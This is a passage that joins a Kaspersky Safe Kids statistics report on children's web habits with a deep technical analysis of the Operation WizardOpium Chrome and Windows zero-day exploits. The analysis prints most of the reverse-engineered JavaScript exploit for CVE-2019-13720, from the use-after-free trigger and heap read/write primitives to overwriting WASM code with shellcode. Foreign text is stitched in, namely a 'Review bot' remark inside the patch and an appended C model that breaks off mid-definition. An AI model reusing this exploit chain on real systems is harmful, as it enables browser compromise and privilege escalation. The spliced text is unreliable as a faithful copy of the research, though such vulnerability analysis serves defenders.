Let us take a closer look at the most popular categories by region and by country to see if children’s preferences changed during the pandemic.

Software, audio, video

Software, Audio, Video has remained ahead of Internet Communications in recent years: kids have used Windows and macOS computers for watching videos and listening to music, but switched to mobile devices to chat. The category has retained its popularity even through the lockdown and online studies.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020

According to KSN statistics for the first half of 2020, Software, Audio, Video began to grow worldwide, reaching a peak of 42.47 percent on all platforms by May.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020

We explained the decrease in the category’s share on macOS in the fall and winter by issues stemming from an operating system update. As for the decline among Windows users around the same time, it was offset by increasing interest in other categories of sites, for instance, E-Commerce.

By the end of the reporting period, the share of Software, Audio, Video had increased among Windows users, whereas children using macOS began watching videos less frequently by May.

Kids in South Asia (India, Bangladesh) were most likely to spend their time watching videos and listening to music (46.16 percent). It was followed by Africa with 44.75 percent and the CIS with 43.83 percent.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by region in June 2019 through May 2020

The category had the lowest share in North America (36.20 percent) and Europe (35.94 percent). As we will see below, children in these regions gave preference not only to watching videos, but video games as well.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS by region in June 2019 through May 2020

In Asia and South Asia, children who used macOS were more likely to consume audio and video content than those who used Windows. In other regions, the category’s Windows share was higher than macOS. In the CIS countries, children’s behavior was nearly identical on the two operating systems.

Interestingly, the distribution of countries where the share of Software, Audio, Video was the largest differs slightly from the regional breakdown.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by country in June 2019 through May 2020

Children in Belarus (50.59 percent), Japan (49.67 percent), Saudi Arabia (49.54 percent) and India (47.66 percent) favored websites that offered video and music over the past year. YouTube was the most popular video streaming service with kids anywhere in the world.

Online communication

Internet Communications predictably peaked at 27.45 percent in April 2020 as the process of switching schoolchildren to distance learning completed in most countries.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020

We observe pronounced growth from 17.87 percent in June 2019 to 36.63 percent in May 2020 on desktop computers and laptops running macOS. October’s peak was due to a reduction in the share of the Software, Audio, Video category following the macOS update.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020

Internet Communications accounted for an average of 32.76 percent, with 32.17 percent in Latin America and 30.54 percent in the CIS, and the lowest recorded shares being 15.50 percent in Europe and 16.58 percent in Oceania.

Kaspersky Safe Kids alerts distribution for Internet Communications by region in June 2019 through May 2020

Kaspersky Safe Kids alerts distribution for Internet Communications by country on average in June 2019 through May 2020

The largest proportions of children using personal computers for internet communication were recorded in Egypt, Kenya, Mexico and Russia. The lowest rates were recorded in Germany, Australia, the UK and Canada.

Starting at the beginning of 2020, the most popular sites in the Internet Communications category were skype.com, hangouts.google.com, web.whatsapp.com, meet.google.com, facebook.com, twitter.com and mail.google.com.

Computer games

Despite the fact that the share of Video Games alerts showed a downward trend in the first half of 2020, the category ranked third among the most popular website topics.

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020

Kids spent more time playing video games on Windows than on macOS desktop computers and laptops. This is due to the fact that most computer games are released for the Windows operating system. However, by the end of the reporting period, macOS users’ interest in games had grown.

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020

Kids all around the world started visiting gaming sites less frequently, though. This can be explained by added activity in the form of school lessons, which relocated into the home due to the pandemic. Interestingly, the share of Video Games began to decline among Windows users starting in the fall of 2019.

While North America, Europe and Oceania did not show increased activity in Internet Communications and Software, Audio, Video, these regions had the highest shares of Video Games activity.

Kaspersky Safe Kids alerts distribution for Video Games by region in June 2019 through May 2020

According to our statistics, the UK had the highest proportion of children interested in games with 23.94 percent, followed by the US with 21.61 percent and Australia with 20.94 percent. The most popular Video Games sites in the UK and the US were blizzard.com, roblox.com, epicgames.com, discordapp.com, ubi.com, origin.com, friv.com, curseforge.com, minecraftmods.com and crazygames.com. Australia’s most popular sites in the category were roblox.com and a variety of Minecraft message boards.

Kaspersky Safe Kids alerts distribution for Video Games by country in June 2019 through May 2020

E-Commerce

E-Commerce is another category where we observed increased activity throughout the year.

Kaspersky Safe Kids alerts distribution for E-Commerce in June 2019 through May 2020

The October 2019 peak, as we said earlier, was associated with a disruption in percentage shares across categories on all platforms due to a malfunction in the new macOS. But in November and December, kids’ interest in online shopping was also higher than in the other months. This is not surprising: November is the time of the Black Friday sales around the world, and December typically sees everyone busy picking Christmas and New Year’s presents.

Kaspersky Safe Kids alerts distribution for E-Commerce on Windows and macOS in June 2019 through May 2020

Children who used macOS spent many more hours browsing online shopping windows than their peers who used Windows.

Kaspersky Safe Kids alerts distribution for E-Commerce by region in June 2019 through May 2020

Children in Europe, North America and Oceania visited online stores and showed interest in shopping more frequently than others. The CIS, Asia and Latin America showed the lowest activity rates in the world.

Kaspersky Safe Kids alerts distribution for E-Commerce by country in June 2019 through May 2020

The leaders by share of visits to online stores were children in Germany (19.51 percent), the UAE (17.22 percent) and Canada (15.86 percent). The lowest figure was recorded in Kazakhstan (4.60 percent) and Egypt (5.18 percent).

The most visited sites in Germany were amazon.de, otto.de, ebay.com; in the UAE, amazon.ae, panemirates.com, amazon.com and luluhypermarket.com; and in Canada, amazon.ca, visions.ca and bestbuy.ca.

News

Not just adults, but kids, too, showed interest in news, especially in light of recent events. The number of children’s visits to news websites grew around the world as coverage of the pandemic began. The peak (7.26 percent) came in March, when most children were switched to distance learning.

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020

Windows users, in general, showed more interest in news than those who used macOS. However, in February, the figure for macOS (7.25 percent) was higher than that for Windows (6.75 percent).

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020

Kaspersky Safe Kids alerts distribution for News by region in June 2019 through May 2020

The largest share of News among Safe Kids users was recorded in Europe (11.11 percent), where the most active news-reading countries were the UK (14.14 percent), Germany (12.75 percent), France (10.97 percent) and Italy (10.25 percent). The lowest rate was recorded in the CIS (3.17 percent) and Africa (3.96 percent).

Kaspersky Safe Kids alerts distribution for News by country in June 2019 through May 2020

Interest in news peaked in the UK and Italy in February. Notably, the transition to distance learning in these two countries took place in late February, whereas Germany and France made the transition in early March, and interest in news there peaked in March as well.

Adult content

Kids were interested in adult content to a lesser extent. According to the global statistics, the popularity of this category peaked in January 2020 (1.12 percent), followed by a decline to the annual average.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020

That said, macOS users showed greater interest in pornography than Windows users.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020

Though in 2019 Windows accounted for a higher percentage of alerts, the trend changed at the beginning of 2020.

Kaspersky Safe Kids alerts distribution for Adult Content by region in June 2019 through May 2020

The CIS and Europe had the largest share of users who showed interest in Adult Content: 1.07 percent and 0.83 percent, respectively. The lowest rates were recorded in the Arab world (0.18 percent) and Oceania (0.24 percent).

However, the distribution by country shows that children in Mexico had the highest interest in Adult Content: 1.72 percent.

Kaspersky Safe Kids alerts distribution for Adult Content by country in June 2019 through May 2020

They were followed by children in Russia (1.06 percent) and France (0.95 percent). Children in China were least likely to access Adult Content on desktop computers: 0.04 percent.

Summary

The world is witnessing an unprecedented demonstration of digital technology primarily helping children develop rather than impeding their development. Online education and communication with friends and relatives are made possible only by technology developed in recent decades, which has become not just a day-to-day assistant but a lifeline at a time when leaving home and making personal contact can pose a health threat.

Data for recent months shows that children who are staying at home with constant access to the computer primarily chat and watch videos. And those are not necessarily just entertaining videos: there might be educational content amid that stream of YouTube clips.

This year, we noticed an interesting trend: children who use different operating systems diverge in their online behaviors. Kids who use macOS spend more time in online stores, show slightly more interest in adult content, chat more online and less frequently visit gaming sites. Windows users show greater interest in games and news, and visit websites with video and audio content more frequently.

We have also learned that children, like adults, pay attention to the news when the situation in the world concerns them directly. So, in the month when various countries were expecting to switch to distance learning, kids started to follow the situation closer by going to news sites.

Today’s children, who start interacting with technology at an early age, find moving all of their day-to-day activities online much easier than adults do, and they are better adapted to situations where going outside could be life-threatening. Adults tend to question certain online activity, such as communication, but in a world where it is the only safe means of social contact, they come to realize that there may be more to it.

28 May 2020

The zero-day exploits of Operation WizardOpium

Back in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we’ve already published blog posts briefly describing this operation (available here and here), in this blog post we’d like to take a deep technical dive into the exploits and vulnerabilities used in this attack.

Google Chrome remote code execution exploit

In the original blog post we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following commit. A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:

if (!buffer) { + BaseAudioContext::GraphAutoLocker context_locker(Context()); + MutexLocker locker(process_lock_); reverb_.reset(); shared_buffer_ = nullptr; return;
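Review bot: the two added lines take the graph lock before `process_lock_`, and only on the `!buffer` path, so the order graph lock then process lock becomes a lock-ordering contract for this class; any other site that resets `reverb_` or `shared_buffer_`, or that already holds `process_lock_` when it needs the graph lock, must use the same order or a deadlock is possible. Both lockers are RAII-scoped and are released at `return`, which is correct here; a one-line comment above them stating that the Render thread reads these members would make the reason for the double lock durable.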

As you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.

```cpp
class MODULES_EXPORT ConvolverHandler final : public AudioHandler {
  ...
  std::unique_ptr<Reverb> reverb_;
  std::unique_ptr<SharedAudioBuffer> shared_buffer_;
  ...
```

These objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.

The exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the PartitionAlloc memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from partition_alloc_constants.h:

```javascript
function getSuperPageBase(addr) {
  let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
  let superPageBaseMask = ~superPageOffsetMask;
  let superPageBase = addr & superPageBaseMask;
  return superPageBase;
}

function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {
  let superPageBase = getSuperPageBase(addr);
  let partitionPageBase = partitionPageIndex << BigInt(14);
  let finalAddr = superPageBase + partitionPageBase;
  return finalAddr;
}

function getPartitionPageIndex(addr) {
  let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
  let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);
  return partitionPageIndex;
}

function getMetadataAreaBaseFromPartitionSuperPage(addr) {
  let superPageBase = getSuperPageBase(addr);
  let systemPageSize = BigInt(0x1000);
  return superPageBase + systemPageSize;
}

function getPartitionPageMetadataArea(addr) {
  let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
  let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);
  let pageMetadataSize = BigInt(0x20);
  let partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;
  return partitionPageMetadataPtr;
}
```

It’s interesting that the exploit also uses the relatively new built-in BigInt class to handle 64-bit values; authors usually use their own primitives in exploits.

At first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.

```javascript
let gcPreventer = [];
let iirFilters = [];

function initialSetup() {
  let audioCtx = new OfflineAudioContext(1, 20, 3000);
  let feedForward = new Float64Array(2);
  let feedback = new Float64Array(1);
  feedback[0] = 1;
  feedForward[0] = 0;
  feedForward[1] = -1;
  for (let i = 0; i < 256; i++)
    iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));
}
```

After that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects – ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.

```javascript
async function triggerUaF(doneCb) {
  let audioCtx = new OfflineAudioContext(2, 0x400000, 48000);
  let bufferSource = audioCtx.createBufferSource();
  let convolver = audioCtx.createConvolver();
  let scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);
  let channelBuffer = audioCtx.createBuffer(1, 1, 48000);
  convolver.buffer = channelBuffer;
  bufferSource.buffer = channelBuffer;
  bufferSource.loop = true;
  bufferSource.loopStart = 0;
  bufferSource.loopEnd = 1;
  channelBuffer.getChannelData(0).fill(0);
  bufferSource.connect(convolver);
  convolver.connect(scriptNode);
  scriptNode.connect(audioCtx.destination);
  bufferSource.start();
  let finished = false;
  scriptNode.onaudioprocess = function(evt) {
    let channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);
    for (let j = 0; j < channelDataArray.length; j++) {
      if (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {
        let u64Array = new BigUint64Array(1);
        let u32Array = new Uint32Array(u64Array.buffer);
        u32Array[0] = channelDataArray[j + 0];
        u32Array[1] = channelDataArray[j + 1];
        let leakedAddr = byteSwapBigInt(u64Array[0]);
        if (leakedAddr >> BigInt(32) > BigInt(0x8000))
          leakedAddr -= BigInt(0x800000000000);
        let superPageBase = getSuperPageBase(leakedAddr);
        if (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {
          finished = true;
          evt = null;
          bufferSource.disconnect();
          scriptNode.disconnect();
          convolver.disconnect();
          setTimeout(function() { doneCb(leakedAddr); }, 1);
          return;
        }
      }
    }
  };
  audioCtx.startRendering().then(function(buffer) {
    buffer = null;
    if (!finished) {
      finished = true;
      triggerUaF(doneCb);
    }
  });
  while (!finished) {
    convolver.buffer = null;
    convolver.buffer = channelBuffer;
    await later(100); // wait 100 milliseconds
  }
}
```

This function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:

```javascript
function later(delay) {
  return new Promise(resolve => setTimeout(resolve, delay));
}
```

During execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.

The PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:

```javascript
function byteSwapBigInt(x) {
  let result = BigInt(0);
  let tmp = x;
  for (let i = 0; i < 8; i++) {
    result = result << BigInt(8);
    result += tmp & BigInt(0xFF);
    tmp = tmp >> BigInt(8);
  }
  return result;
}
```

The exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function initialUAFCallback.

```javascript
let sharedAudioCtx;
let iirFilterFeedforwardAllocationPtr;

function initialUAFCallback(addr) {
  sharedAudioCtx = new OfflineAudioContext(1, 1, 3000);
  let partitionPageIndexDelta = undefined;
  switch (majorVersion) {
    case 77: // 77.0.3865.75
      partitionPageIndexDelta = BigInt(-26);
      break;
    case 76: // 76.0.3809.87
      partitionPageIndexDelta = BigInt(-25);
      break;
  }
  iirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);
  triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);
}
```

The exploit uses the leaked pointer to get the address of the raw pointer to the feedforward_ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.

The vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.

```javascript
let floatArray = new Float32Array(10);
let audioBufferArray1 = [];
let audioBufferArray2 = [];
let imageDataArray = [];

async function triggerSecondUAF(addr, doneCb) {
  let counter = 0;
  let numChannels = 1;
  let audioCtx = new OfflineAudioContext(1, 0x100000, 48000);
  let bufferSource = audioCtx.createBufferSource();
  let convolver = audioCtx.createConvolver();
  let bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);
  let smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);
  smallAudioBuffer.getChannelData(0).fill(0);
  for (let i = 0; i < numChannels; i++) {
    let channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);
    channelDataArray[0] = addr;
  }
  bufferSource.buffer = bigAudioBuffer;
  convolver.buffer = smallAudioBuffer;
  bufferSource.loop = true;
  bufferSource.loopStart = 0;
  bufferSource.loopEnd = 1;
  bufferSource.connect(convolver);
  convolver.connect(audioCtx.destination);
  bufferSource.start();
  let finished = false;
  audioCtx.startRendering().then(function(buffer) {
    buffer = null;
    if (finished) {
      audioCtx = null;
      setTimeout(doneCb, 200);
      return;
    } else {
      finished = true;
      setTimeout(function() { triggerSecondUAF(addr, doneCb); }, 1);
    }
  });
  while (!finished) {
    counter++;
    convolver.buffer = null;
    await later(1); // wait 1 millisecond
    if (finished) break;
    for (let i = 0; i < iirFilters.length; i++) {
      floatArray.fill(0);
      iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);
      if (floatArray[0] != 3.1415927410125732) {
        finished = true;
        audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));
        audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));
        bufferSource.disconnect();
        convolver.disconnect();
        return;
      }
    }
    convolver.buffer = smallAudioBuffer;
    await later(1); // wait 1 millisecond
  }
}
```

This time the exploit uses the function getFrequencyResponse() to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.

```cpp
void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,
                                        const float* frequency_hz,
                                        float* mag_response,
                                        float* phase_response) {
  ...
  Vector<float> frequency(n_frequencies);
  double nyquist = this->Nyquist();
  // Convert from frequency in Hz to normalized frequency (0 -> 1),
  // with 1 equal to the Nyquist frequency.
  for (int k = 0; k < n_frequencies; ++k)
    frequency[k] = frequency_hz[k] / nyquist;
  ...
```

If the resulting array contains a value other than π, it means exploitation was successful. If that’s the case, the exploit stops its recursion and executes the function finalUAFCallback to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.

```javascript
async function finalUAFCallback() {
  for (let i = 0; i < 256; i++) {
    floatArray.fill(0);
    iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);
    if (floatArray[0] != 3.1415927410125732) {
      await collectGargabe();
      audioBufferArray2 = [];
      for (let j = 0; j < 80; j++)
        audioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));
      iirFilters = new Array(1);
      await collectGargabe();
      for (let j = 0; j < 336; j++)
        imageDataArray.push(new ImageData(1, 2));
      imageDataArray = new Array(10);
      await collectGargabe();
      for (let j = 0; j < audioBufferArray1.length; j++) {
        let auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);
        if (auxArray[0] != BigInt(0)) {
          kickPayload(auxArray);
          return;
        }
      }
      return;
    }
  }
}
```

Heap defragmentation is performed with multiple calls to the improvised collectGargabe() function (the misspelled name is the exploit author’s), which creates huge ArrayBuffers in a loop.

```javascript
function collectGargabe() {
  let promise = new Promise(function(cb) {
    let arg;
    for (let i = 0; i < 400; i++)
      new ArrayBuffer(1024 * 1024 * 60).buffer;
    cb(arg);
  });
  return promise;
}
```

After those steps, the exploit executes the function kickPayload() passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray’s data.

```javascript
async function kickPayload(auxArray) {
  let audioCtx = new OfflineAudioContext(1, 1, 3000);
  let partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));
  auxArray[0] = byteSwapBigInt(partitionPagePtr);
  let i = 0;
  do {
    gcPreventer.push(new ArrayBuffer(8));
    if (++i > 0x100000) return;
  } while (auxArray[0] != BigInt(0));
  let freelist = new BigUint64Array(new ArrayBuffer(8));
  gcPreventer.push(freelist);
  ...
```

The exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.

```javascript
function read64(rwHelper, addr) {
  rwHelper[0] = addr;
  var tmp = new BigUint64Array;
  tmp.buffer;
  gcPreventer.push(tmp);
  return byteSwapBigInt(rwHelper[0]);
}

function write64(rwHelper, addr, value) {
  rwHelper[0] = addr;
  var tmp = new BigUint64Array(1);
  tmp.buffer;
  tmp[0] = value;
  gcPreventer.push(tmp);
}
```

After the building of the arbitrary read/write primitives comes the final stage – executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a “dummy” WASM module and it results in the allocation of memory pages for JIT compiled code.

```javascript
const wasmBuffer = new Uint8Array([...]);
const wasmBlob = new Blob([wasmBuffer], { type: "application/wasm" });
const wasmUrl = URL.createObjectURL(wasmBlob);
var wasmFuncA = undefined;
WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {
  wasmFuncA = result.instance.exports.a;
});
```

To execute the exported function wasmFuncA, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the getPartitionPageFreeListHeadEntryBySlotSize() function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.

```javascript
let fileReader = new FileReader;
let fileReaderLoaderSize = 0x140;
let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);
if (!fileReaderLoaderPtr) return;
fileReader.readAsArrayBuffer(new Blob([]));
let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);
if (fileReaderLoaderPtr == fileReaderLoaderTestPtr) return;
```

The exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.

```javascript
fileReader.onerror = wasmFuncA;
let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);
let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));
let registeredEventListenerPtr = read64(freelist, vectorPtr);
let eventListenerPtr = read64(freelist, registeredEventListenerPtr);
let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));
let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));
let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);
let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);
let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);
let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);
let stubAddrFieldOffset = undefined;
switch (majorVersion) {
  case 77:
    stubAddrFieldOffset = BigInt(0x8) * BigInt(16);
    break;
  case 76:
    stubAddrFieldOffset = BigInt(0x8) * BigInt(17);
    break;
}
let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);
```

The variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it’s sufficient to overwrite it with shellcode. To do so, the exploit uses the function getPartitionPageFreeListHeadEntryBySlotSize() again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.

```javascript
let arrayBufferSize = 0x20;
let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);
if (!arrayBufferPtr) return;
let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);
gcPreventer.push(audioBuffer);
```

The exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.

```javascript
let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));
write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);
write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));
```

Now all that’s needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.

```javascript
let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);
payloadArray.set(shellcode, 0);
payloadArray.set(peBinary, shellcode.length);
```

To prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.

```javascript
write64(freelist, partitionPagePtr, BigInt(0));
```

Now, in order to execute the shellcode, it’s enough to call the exported WASM function.

```javascript
try {
  wasmFuncA();
} catch (e) {}
```

Microsoft Windows elevation of privilege exploit

The shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome’s sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of a bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That’s quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities, and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It’s also important to note that Google Chrome has a special security feature called Win32k lockdown, developed and supported by James Forshaw of Google Project Zero. This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it’s fair to assume that Operation WizardOpium targeted users running Windows 7.

CVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k, Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of the tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, the win32k component has a syscall, SetWindowLongPtr, that can be used to set this extra data (after validation, of course). It’s worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). A common issue is that extra data which has not been properly initialized can lead to system procedures handling it incorrectly. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was simply insufficient.

```c
xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)
  ...
  if ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )
  ...
  extraData = (BYTE*)tagWND + sizeof(tagWND) + index
  old = *(QWORD*)extraData;
  *(QWORD*)extraData = data;
  return old;
```

A check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.
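To make the failed check concrete, here is an added C model of that validation; it is neither Microsoft's code nor code from the post. The structure layout, the FNID numbering and the table size are constructed placeholders; only the field names and the shape of the comparison follow the decompiled snippet above, and the hardened variant shows the checks a bounds test on class extra data needs.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed model: real win32k layouts differ. Only the field names
 * (fnid, cbwndExtra, mpFnid_serverCBWndProc) and the shape of the
 * comparison follow the decompiled snippet in the post. */
#define FNID_FIRST      0x29A   /* base subtracted from fnid in the post */
#define FNID_SWITCH_X   0x29B   /* constructed: stands in for FNID_SWITCH */
#define FNID_TABLE_LEN  0x20    /* constructed table size */

typedef struct {
    uint8_t  head[0x28];        /* constructed placeholder for the window header */
    uint16_t fnid;              /* window class id, as in the post */
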